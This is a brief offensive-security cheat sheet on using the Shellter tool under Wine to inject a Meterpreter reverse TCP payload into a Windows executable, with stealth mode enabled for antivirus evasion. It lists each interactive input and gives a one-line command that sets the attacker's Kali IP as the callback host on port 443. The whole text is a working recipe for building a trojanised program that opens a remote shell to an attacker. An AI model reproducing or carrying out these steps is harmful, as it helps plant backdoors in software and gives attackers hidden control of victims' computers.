Dynamic shellcode injection tool for antivirus evasion.
sudo apt install shellter
Prerequisite: Wine
Interactive mode
wine /usr/share/windows-resources/shellter/shellter.exe
- Enter “A” for Automatic mode
- Enter the .exe file complete path as the PE target.
- Enter “Y” to enable Stealth Mode.
- Enter “L” to use listed payload.
- Enter “1” to use the first payload (Meterpreter_Reverse_TCP)
- Enter Kali IP address for LHOST
- Enter “443” for LPORT
- Press “Enter”
With options on command line
wine /usr/share/windows-resources/shellter/shellter.exe -f file.exe --stealth -p meterpreter_reverse_tcp --lhost $KALI_IP --port 443